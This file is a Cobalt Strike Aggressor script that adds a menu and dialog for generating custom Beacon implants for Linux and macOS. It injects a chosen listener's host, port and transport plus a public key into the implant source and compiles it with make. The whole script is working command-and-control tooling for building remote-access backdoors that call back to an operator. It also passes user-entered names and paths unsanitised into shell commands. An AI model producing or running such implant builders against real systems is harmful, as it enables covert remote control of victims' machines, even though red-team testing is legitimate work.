$ProjectLocation = "/home/ee/Tools/c2/CobaltStrike/"; # <-- SET THE DIRECTORY LOCATION CONTAINING THE PROJECT

$CustomBeaconProjectFolder = $ProjectLocation . "/CobaltStrike-Linux-Beacon/";
$GeneratePayloadDirectory = $CustomBeaconProjectFolder . "/generate-payload/";
$ImplantSrcDirectory = $CustomBeaconProjectFolder . "/implant/";

#######################################

#   Generate Payload Menu Bar Below   #

#######################################

menubar("Custom Beacons", "generate"); # Creates a menu bar at the top
popup generate {                # When clicked more buttons appear
	item "Generate Custom Beacons" {  genBeaconMenu();  }  # Item 1 button that appears, creates pop up when clicked.
};

# Create a function that makes a pop up submenu for generating payloads with different options you can select
sub genBeaconMenu {

	# Create a dialog. Use &dialog_show to show it. Args in Order: 1. Title of the dialog; 2. A %dictionary mapping row names to default values; 3.A callback function that gets called when the user presses a &dbutton_action button.
	# $1 is a reference to the dialog. $2 is the button name. $3 is a dictionary that maps each row's name to its value.
	$dialog = dialog("Custom Beacon Generator", %(listener => "Select Listener: ", Beacon_name => "Beacon_x64", Profile_path => "../profiles/http/default-profile.json", platform => "Linux"), &genPayload); 
	
	# Adds a description to a &dialog
	dialog_description($dialog, "Creates a custom Beacon implant\n- Supports Linux x64 and macOS ARM64");
	
	# Adds a listener selection row to a &dialog. This row only shows listeners with stagers (e.g., windows/beacon_https/reverse_https).
	drow_listener_stage($dialog, "listener", "Listener: "); # Alternative is drow_listener which only shows staged Beacons whereas this shows stageless and staged

	# Adds a text field row to a &dialog
	drow_text($dialog, "Beacon_name", "Executable Name: "); 
	drow_text($dialog, "Profile_path", "Profile Path: ");
	
	drow_combobox($dialog, "platform", "Platform: ", @("Linux", "macOS"));

	# Adds an action button to a &dialog. When this button is pressed, the dialog closes and its callback is called.
	dbutton_action($dialog, "Generate");
	
	# Shows a &dialog.
	dialog_show($dialog);
}

# Callback function that gets called when you click Generate.
sub genPayload {
	#
	# check if user is on a linux or windows box
	#	
	if (substr(cwd(), 0, 1) eq "/") {
		$os = "unix";
	} else {
		$os = "windows";
		show_message("Generating custom payloads on Windows has not yet been tested!");
		return;
	}
	
	$filename = $3['Beacon_name']; 
	$ProfilePath = $3['Profile_path'];
	$platform = $3['platform'];
	$TargetFlag = "";
	$TargetImplantDir = $ImplantSrcDirectory;

	if ($platform eq "macOS") {
		$TargetFlag = " --target macos";
		$TargetImplantDir = $CustomBeaconProjectFolder . "/implant-macos/";
	} else {
		$TargetFlag = " --target linux";
		$TargetImplantDir = $CustomBeaconProjectFolder . "/implant/";
	}

	if ($ProfilePath eq "")
	{
		$ProfilePath = "../profiles/http/default-profile.json";
	}

	# Listener needs to be selected
	if ($3['listener'] ismatch "Select Listener: ") {
		berror($1, 'You did not select a Listener.');
		show_message("Please select a Listener.");
	}

	# https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_functions.htm#listener_info
	# PRINTF DEBUGGING
	#foreach $key => $value (listener_info($3['listener']))
	#{
	#	println("$[15]key $value");
   	#}

	#
	# This is for inserting the specified listener information into the implant
	#
	$HTTPSvalue = "0";
	$ListenerName = $3['listener'];
	$payloadType = listener_info($ListenerName, "payload");
	$transport = "http";

	if ($payloadType eq "windows/beacon_http/reverse_http")
	{
		$HTTPSvalue = "0";
		$transport = "http";
	}
	else if ($payloadType eq "windows/beacon_https/reverse_https")
	{
		$HTTPSvalue = "1";
		$transport = "http";
	}
	else if ($payloadType eq "windows/beacon_bind_tcp" || $payloadType eq "windows/beacon_reverse_tcp")
	{
		$transport = "tcp";
		if ($platform eq "macOS") {
			show_message("TCP transport is not yet supported on macOS!");
			return;
		}
	}
	else
	{
		show_message("Unsupported listener type: " . $payloadType . ". Only reverse_http, reverse_https, and bind/reverse_tcp are supported.");
		return;
	}

	$TargetServer = listener_info($ListenerName, "host");
	$TargetPort = listener_info($ListenerName, "port");
	
	# InsertListenerInfo.py runs validate_profile.py + render_profile_header.py
	# so generation fails fast before make if profile config is invalid.
	$command = "python3 InsertListenerInfo.py " . $TargetServer . " " . $TargetPort . " " . $HTTPSvalue . " " . $ProfilePath . $TargetFlag . " --transport " . $transport;
	println($command);
	$process = exec($command, $null, $GeneratePayloadDirectory);
	@data = readAll($process);
	foreach $line (@data) {
        println($line);
    }
	closef($process);

	#
	# Locate public key file
	#
	$publickeylocation = $CustomBeaconProjectFolder . "/generate-payload/publickey.txt";
	if (!-exists $publickeylocation)
    {
        show_message("Public key file was not found! Make sure to generate public key. Check README for more information.");
        return;
    }
	
	#
	# Insert public key into beacon.c
	#
	$command = "python3 InsertPublicKey.py" . $TargetFlag;
	println($command);
	$process = exec($command, $null, $GeneratePayloadDirectory);
	@data = readAll($process);
	foreach $line (@data) {
        println($line);
    }
	closef($process);
	
	#
	# Build implant
	#
	$command = "make clean -f Makefile OUTPUT=" . $filename . " TRANSPORT=" . $transport;
	println($command);
	$process = exec($command, $null, $TargetImplantDir);
	@data = readAll($process);
	foreach $line (@data) {
        println($line);
    }
    closef($process);
	
	$command = "make -f Makefile OUTPUT=" . $filename . " TRANSPORT=" . $transport;
	println($command);
	$process = exec($command, $null, $TargetImplantDir);
	@data = readAll($process);
	foreach $line (@data) {
        println($line);
    }
    closef($process);

	#
	# Remove public key from beacon.c after compiling
	#
	$command = "python3 RemovePublicKey.py" . $TargetFlag;
	println($command);
	$process = exec($command, $null, $GeneratePayloadDirectory);
	@data = readAll($process);
	foreach $line (@data) {
        println($line);
    }
	closef($process);

	#
	# Yay
	#
	show_message("Your custom " . $platform . " implant has been generated at " . $TargetImplantDir . "/bin/" . $filename);
	
}
